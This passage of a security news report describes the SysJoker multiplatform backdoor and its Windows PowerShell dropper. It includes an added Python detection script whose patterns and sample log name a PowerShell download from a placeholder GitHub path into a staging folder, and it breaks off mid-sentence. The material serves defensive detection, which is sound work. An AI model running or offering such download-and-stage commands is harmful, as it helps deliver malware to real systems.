Cybersecurity researchers have issued a warning about SysJoker, a brand-new multiplatform malware that targets Windows, Mac, and Linux. According to them, the backdoor is able to remain undetected on all three operating systems.
The new backdoor was initially discovered in December 2021 by experts at security software company Intezer during an active attack on a Linux-based web server of a leading educational institution.
The researchers believe that the SysJoker attack began during the second half of 2021, based on command and control (C2) domain registration and the samples discovered in VirusTotal.
More on SysJoker Malware
The newly discovered backdoor is written in the C++ programming language, and while each version is tailored to the targeted operating system, all of them go unnoticed on VirusTotal, an online malware scanning tool that uses 57 different antivirus detection engines.
SysJoker Backdoor M.O.
As explained by BleepingComputer, the Windows version, unlike the Mac and Linux samples, includes a first-stage dropper. The dropper is a DLL that uses PowerShell commands to download the SysJoker ZIP from a GitHub repository, unzip it into “C:\ProgramData\RecoverySystem,” and run the payload.
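As an added, defender-side example (not code from the article or from Intezer), the following Python flags process-creation records that match the dropper behaviour just described: PowerShell fetching from GitHub or writing into C:\ProgramData\RecoverySystem, and anything launched from that folder. The record format, field names and log lines are constructed, and the GitHub path is a placeholder.

```python
r"""Added detection example, not code from the article or from Intezer. It flags
constructed process-creation records that match the dropper behaviour described above:
PowerShell fetching from GitHub or writing into C:\ProgramData\RecoverySystem."""
import re
from dataclasses import dataclass
from typing import List, Optional

STAGING_DIR = re.compile(r"c:\\programdata\\recoverysystem", re.IGNORECASE)  # path from the report
GITHUB_HOST = re.compile(r"github\.com|githubusercontent\.com", re.IGNORECASE)
POWERSHELL = re.compile(r"(^|\\)(powershell|pwsh)\.exe$", re.IGNORECASE)

@dataclass
class Finding:
    line_no: int
    reason: str
    command: str

def parse_event(line: str) -> dict:
    """Parse a constructed 'Key=value|Key=value' record (assumes no '|' inside values)."""
    return dict(kv.split("=", 1) for kv in line.strip().split("|") if "=" in kv)

def score_event(ev: dict) -> Optional[str]:
    """Return why the event matches the dropper pattern, or None if it does not."""
    image, cmd, reasons = ev.get("Image", ""), ev.get("CommandLine", ""), []
    if POWERSHELL.search(image):
        if GITHUB_HOST.search(cmd):
            reasons.append("powershell fetching from github")
        if STAGING_DIR.search(cmd):
            reasons.append("powershell touching ProgramData\\RecoverySystem")
    elif STAGING_DIR.search(image):
        reasons.append("process launched from ProgramData\\RecoverySystem")
    return "; ".join(reasons) or None

def scan(lines: List[str]) -> List[Finding]:
    """Run score_event over every record and collect the hits with their line numbers."""
    hits = []
    for n, line in enumerate(lines, 1):
        ev = parse_event(line)
        reason = score_event(ev)
        if reason:
            hits.append(Finding(n, reason, ev.get("CommandLine") or ev.get("Image", "")))
    return hits

# Constructed sample records; the GitHub repo path is a placeholder, not a real IoC.
SAMPLE_LOG = [
    r"Image=C:\Windows\System32\svchost.exe|CommandLine=svchost.exe -k netsvcs",
    r"Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell.exe -File C:\Scripts\backup.ps1",
    r"Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell.exe -c Invoke-WebRequest https://github.com/PLACEHOLDER/x.zip -OutFile C:\ProgramData\RecoverySystem\x.zip",
    r"Image=C:\ProgramData\RecoverySystem\payload.exe|CommandLine=payload.exe",
]
```

Running scan(SAMPLE_LOG) returns two findings: the PowerShell download into the staging folder and the payload started from it, while the benign PowerShell backup script is not flagged.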
As per the report, when the backdoor is executed, it sleeps for 90 to 120 seconds. Then it will start